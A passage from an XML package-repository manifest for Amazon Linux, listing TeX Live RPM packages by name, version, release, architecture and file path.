epoch="2" arch="x86_64"><filename>Packages/texlive-fontware-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-mnsymbol-doc" version="svn18651.1.4" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-mnsymbol-doc-svn18651.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-fp" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fp-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-iftex" version="svn29654.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-iftex-svn29654.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-psnfss-doc" version="svn23394.9.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-psnfss-doc-svn23394.9.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-fancybox-doc" version="svn18304.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fancybox-doc-svn18304.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-3d" version="svn17257.1.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-3d-svn17257.1.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-parskip" version="svn19963.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-parskip-svn19963.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lualatex-math-doc" version="svn29346.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lualatex-math-doc-svn29346.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-was" version="svn21439.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-was-svn21439.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lualatex-math" version="svn29346.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lualatex-math-svn29346.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-textpos" version="svn28261.1.7h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textpos-svn28261.1.7h-45.amzn1.noarch.rpm</filename></package><package 
name="texlive-pst-slpe-doc" version="svn24391.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-slpe-doc-svn24391.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-euenc-doc" version="svn19795.0.1h" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euenc-doc-svn19795.0.1h-45.amzn1.noarch.rpm</filename></package><package name="texlive-titlesec-doc" version="svn24852.2.10.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-titlesec-doc-svn24852.2.10.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-thumbpdf-doc" version="svn26689.3.15" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-thumbpdf-doc-svn26689.3.15-45.amzn1.noarch.rpm</filename></package><package name="texlive-t2" version="svn29349.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-t2-svn29349.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-unisugar-doc" version="svn22357.0.92" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-unisugar-doc-svn22357.0.92-45.amzn1.noarch.rpm</filename></package><package name="texlive-times" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-times-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-showexpl" version="svn27790.v0.3j" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-showexpl-svn27790.v0.3j-45.amzn1.noarch.rpm</filename></package><package name="texlive-sansmath-doc" version="svn17997.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sansmath-doc-svn17997.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-crop-doc" version="svn15878.1.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-crop-doc-svn15878.1.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-pslatex" version="svn16416.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-pslatex-svn16416.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xunicode-doc" version="svn23897.0.981" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xunicode-doc-svn23897.0.981-45.amzn1.noarch.rpm</filename></package><package name="texlive-cns" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cns-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-luaotfload-doc" version="svn26718.1.26" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luaotfload-doc-svn26718.1.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfm-bin" version="svn13663.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfm-bin-svn13663.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-memoir" version="svn21638.3.6j_patch_6.0g" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-memoir-svn21638.3.6j_patch_6.0g-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvips-doc" version="svn29585.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvips-doc-svn29585.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsmath-doc" version="svn29327.2.14" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amsmath-doc-svn29327.2.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-mptopdf" version="svn26689.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mptopdf-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-paralist-doc" version="svn15878.2.3b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-paralist-doc-svn15878.2.3b-45.amzn1.noarch.rpm</filename></package><package name="texlive-lastpage-doc" version="svn28985.1.2l" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-lastpage-doc-svn28985.1.2l-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3kernel" version="svn29409.SVN_4469" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3kernel-svn29409.SVN_4469-45.amzn1.noarch.rpm</filename></package><package name="texlive-babelbib" version="svn25245.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babelbib-svn25245.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-caption-doc" version="svn29026.3.3__2013_02_03_" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-caption-doc-svn29026.3.3__2013_02_03_-45.amzn1.noarch.rpm</filename></package><package name="texlive-ae" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ae-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-math-doc" version="svn20176.0.61" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-math-doc-svn20176.0.61-45.amzn1.noarch.rpm</filename></package><package name="texlive-enumitem" version="svn24146.3.5.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-enumitem-svn24146.3.5.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-was-doc" version="svn21439.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-was-doc-svn21439.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-multido-doc" version="svn18302.1.42" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-multido-doc-svn18302.1.42-45.amzn1.noarch.rpm</filename></package><package name="texlive-eepic" version="svn15878.1.1e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eepic-svn15878.1.1e-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyphen-base" version="svn29197.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-hyphen-base-svn29197.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fixlatvian-doc" version="svn21631.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fixlatvian-doc-svn21631.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdfpages" version="svn27574.0.4t" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pdfpages-svn27574.0.4t-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontspec-doc" version="svn29412.v2.3a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontspec-doc-svn29412.v2.3a-45.amzn1.noarch.rpm</filename></package><package name="texlive-luaotfload" version="svn26718.1.26" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luaotfload-svn26718.1.26-45.amzn1.noarch.rpm</filename></package><package name="texlive-caption" version="svn29026.3.3__2013_02_03_" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-caption-svn29026.3.3__2013_02_03_-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontspec" version="svn29412.v2.3a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontspec-svn29412.v2.3a-45.amzn1.noarch.rpm</filename></package><package name="texlive-fpl" version="svn15878.1.002" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fpl-svn15878.1.002-45.amzn1.noarch.rpm</filename></package><package name="texlive-kpathsea-bin" version="svn27347.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-kpathsea-bin-svn27347.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-typehtml" version="svn17134.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-typehtml-svn17134.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-metafont" version="svn26689.2.718281" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-metafont-svn26689.2.718281-45.amzn1.noarch.rpm</filename></package><package name="texlive-xkeyval-doc" version="svn27995.2.6a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xkeyval-doc-svn27995.2.6a-45.amzn1.noarch.rpm</filename></package><package name="texlive-extsizes" version="svn17263.1.4a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-extsizes-svn17263.1.4a-45.amzn1.noarch.rpm</filename></package><package name="texlive-wadalab-doc" version="svn22576.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wadalab-doc-svn22576.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lua-alt-getopt-doc" version="svn29349.0.7.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lua-alt-getopt-doc-svn29349.0.7.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-preprint" version="svn16085.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-preprint-svn16085.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texconfig-bin" version="svn27344.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texconfig-bin-svn27344.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-marginnote" version="svn25880.v1.1i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marginnote-svn25880.v1.1i-45.amzn1.noarch.rpm</filename></package><package name="texlive-xmltex-bin" version="svn3006.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xmltex-bin-svn3006.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-uhc-doc" version="svn16791.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-uhc-doc-svn16791.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-courier" version="svn28614.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-courier-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-marginnote-doc" version="svn25880.v1.1i" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-marginnote-doc-svn25880.v1.1i-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasy" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasy-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfm-doc" version="svn26689.0.13.2d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfm-doc-svn26689.0.13.2d-45.amzn1.noarch.rpm</filename></package><package name="texlive-textcase-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textcase-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fncychap" version="svn20710.v1.34" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fncychap-svn20710.v1.34-45.amzn1.noarch.rpm</filename></package><package name="texlive-framed" version="svn26789.0.96" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-framed-svn26789.0.96-45.amzn1.noarch.rpm</filename></package><package name="texlive-sectsty" version="svn15878.2.0.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sectsty-svn15878.2.0.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-uhc" version="svn16791.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-uhc-svn16791.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-euro" version="svn22191.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-euro-svn22191.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-fp-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fp-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package 
name="texlive-xecyr-doc" version="svn20221.1.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecyr-doc-svn20221.1.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks-doc" version="svn29678.2.39" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-doc-svn29678.2.39-45.amzn1.noarch.rpm</filename></package><package name="texlive-subfig-doc" version="svn15878.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-subfig-doc-svn15878.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-underscore" version="svn18261.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-underscore-svn18261.0-45.amzn1.noarch.rpm</filename></package><package name="texlive" version="2012" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-2012-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-anysize-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-anysize-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-sauerj" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-sauerj-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra-bin" version="svn22566.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-texlive.infra-bin-svn22566.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-luatexbase-doc" version="svn22560.0.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-luatexbase-doc-svn22560.0.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-tetex" version="svn29585.3.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tetex-svn29585.3.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-charter-doc" version="svn15878.0" 
release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-charter-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-wasy-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-wasy-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-text" version="svn15878.1.00" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-text-svn15878.1.00-45.amzn1.noarch.rpm</filename></package><package name="texlive-l3kernel-doc" version="svn29409.SVN_4469" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-l3kernel-doc-svn29409.SVN_4469-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-slpe" version="svn24391.1.31" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-slpe-svn24391.1.31-45.amzn1.noarch.rpm</filename></package><package name="texlive-xetex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-xetex-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-anysize" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-anysize-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-attachfile" version="svn21866.v1.5b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-attachfile-svn21866.v1.5b-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex-bin" version="svn26912.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-tex-bin-svn26912.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-ifluatex-doc" version="svn26725.1.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifluatex-doc-svn26725.1.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-amsfonts-doc" version="svn29208.3.04" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-amsfonts-doc-svn29208.3.04-45.amzn1.noarch.rpm</filename></package><package name="texlive-metapost-doc" version="svn26689.1.212" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-metapost-doc-svn26689.1.212-45.amzn1.noarch.rpm</filename></package><package name="texlive-colortbl-doc" version="svn25394.v1.0a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-colortbl-doc-svn25394.v1.0a-45.amzn1.noarch.rpm</filename></package><package name="texlive-amscls" version="svn29207.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-amscls-svn29207.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-mparhack-doc" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mparhack-doc-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-tex4ht" version="svn29474.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tex4ht-svn29474.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-threeparttable-doc" version="svn17383.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-threeparttable-doc-svn17383.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-listings" version="svn15878.1.4" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-listings-svn15878.1.4-45.amzn1.noarch.rpm</filename></package><package name="texlive-bookman" version="svn28614.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bookman-svn28614.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-lm" version="svn28119.2.004" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-lm-svn28119.2.004-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-math" version="svn20176.0.61" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-pst-math-svn20176.0.61-45.amzn1.noarch.rpm</filename></package><package name="texlive-texlive.infra" version="svn28217.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-texlive.infra-svn28217.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-super-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-super-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtex" version="svn26689.0.99d" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtex-svn26689.0.99d-45.amzn1.noarch.rpm</filename></package><package name="texlive-cjk" version="svn26296.4.8.3" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cjk-svn26296.4.8.3-45.amzn1.noarch.rpm</filename></package><package name="texlive-stmaryrd" version="svn22027.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-stmaryrd-svn22027.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ulem-doc" version="svn26785.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ulem-doc-svn26785.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bibtopic-doc" version="svn15878.1.1a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bibtopic-doc-svn15878.1.1a-45.amzn1.noarch.rpm</filename></package><package name="texlive-overpic" version="svn19712.0.53" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-overpic-svn19712.0.53-45.amzn1.noarch.rpm</filename></package><package name="texlive-appendix" version="svn15878.1.2b" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-appendix-svn15878.1.2b-45.amzn1.noarch.rpm</filename></package><package name="texlive-eso-pic" version="svn21515.2.0c" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-eso-pic-svn21515.2.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfware-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-mfware-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-breakurl-doc" version="svn15878.1.30" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-breakurl-doc-svn15878.1.30-45.amzn1.noarch.rpm</filename></package><package name="texlive-changepage" version="svn15878.1.0c" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-changepage-svn15878.1.0c-45.amzn1.noarch.rpm</filename></package><package name="texlive-multido" version="svn18302.1.42" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-multido-svn18302.1.42-45.amzn1.noarch.rpm</filename></package><package name="texlive-cmextra" version="svn14075.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cmextra-svn14075.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-xkeyval" version="svn27995.2.6a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xkeyval-svn27995.2.6a-45.amzn1.noarch.rpm</filename></package><package name="texlive-textcase" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-textcase-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-blur-doc" version="svn15878.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-blur-doc-svn15878.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-url-doc" version="svn16864.3.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-url-doc-svn16864.3.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-type1cm" version="svn21820.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-type1cm-svn21820.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-makeindex-doc" version="svn26689.2.12" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-makeindex-doc-svn26689.2.12-45.amzn1.noarch.rpm</filename></package><package name="texlive-oberdiek-doc" version="svn26725.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-oberdiek-doc-svn26725.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fontwrap-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fontwrap-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ltxmisc" version="svn21927.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ltxmisc-svn21927.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipdfmx-def" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-dvipdfmx-def-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucharclasses-doc" version="svn27820.2.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucharclasses-doc-svn27820.2.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-bigfoot-doc" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-bigfoot-doc-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pstricks-add-doc" version="svn28750.3.59" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pstricks-add-doc-svn28750.3.59-45.amzn1.noarch.rpm</filename></package><package name="texlive-ucs" version="svn27549.2.1" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ucs-svn27549.2.1-45.amzn1.noarch.rpm</filename></package><package name="texlive-dvipng" version="svn26689.1.14" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-dvipng-svn26689.1.14-45.amzn1.noarch.rpm</filename></package><package name="texlive-mfware" version="svn26689.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-mfware-svn26689.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-3d-doc" version="svn17257.1.10" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-3d-doc-svn17257.1.10-45.amzn1.noarch.rpm</filename></package><package name="texlive-cm-lgc-doc" version="svn28250.0.5" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-cm-lgc-doc-svn28250.0.5-45.amzn1.noarch.rpm</filename></package><package name="texlive-xecjk-doc" version="svn28816.3.1.2" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-xecjk-doc-svn28816.3.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-pst-node-doc" version="svn27799.1.25" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-pst-node-doc-svn27799.1.25-45.amzn1.noarch.rpm</filename></package><package name="texlive-pdftex-bin" version="svn27321.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-pdftex-bin-svn27321.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-fpl-doc" version="svn15878.1.002" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fpl-doc-svn15878.1.002-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifmtarg-doc" version="svn19363.1.2a" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ifmtarg-doc-svn19363.1.2a-45.amzn1.noarch.rpm</filename></package><package name="texlive-svn-prov" version="svn18017.3.1862" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-svn-prov-svn18017.3.1862-45.amzn1.noarch.rpm</filename></package><package name="texlive-utopia" version="svn15878.0" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-utopia-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-fix2col" version="svn17133.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-fix2col-svn17133.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-kerkis" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-kerkis-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-hyperref-doc" version="svn28213.6.83m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-hyperref-doc-svn28213.6.83m-45.amzn1.noarch.rpm</filename></package><package name="texlive-passivetex" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-passivetex-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-jknapltx-doc" version="svn19440.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-jknapltx-doc-svn19440.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-booktabs" version="svn15878.1.61803" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-booktabs-svn15878.1.61803-45.amzn1.noarch.rpm</filename></package><package name="texlive-makeindex-bin" version="svn26509.0" release="45.20130427_r30134.amzn1" epoch="2" arch="x86_64"><filename>Packages/texlive-makeindex-bin-svn26509.0-45.20130427_r30134.amzn1.x86_64.rpm</filename></package><package name="texlive-ntgclass" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-ntgclass-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-babel-doc" version="svn24756.3.8m" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-babel-doc-svn24756.3.8m-45.amzn1.noarch.rpm</filename></package><package name="texlive-ifetex-doc" version="svn24853.1.2" release="45.amzn1" epoch="2" 
arch="noarch"><filename>Packages/texlive-ifetex-doc-svn24853.1.2-45.amzn1.noarch.rpm</filename></package><package name="texlive-carlisle" version="svn18258.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-carlisle-svn18258.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-eepic-doc" version="svn15878.1.1e" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-eepic-doc-svn15878.1.1e-45.amzn1.noarch.rpm</filename></package><package name="texlive-arphic" version="svn15878.0" release="45.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-arphic-svn15878.0-45.amzn1.noarch.rpm</filename></package><package name="texlive-tetex-bin" version="svn27344.0" release="45.20130427_r30134.amzn1" epoch="2" arch="noarch"><filename>Packages/texlive-tetex-bin-svn27344.0-45.20130427_r30134.amzn1.noarch.rpm</filename></package><package name="texlive-xunicode" version="svn23897.0.981" release="45.amzn1" epoch="2" 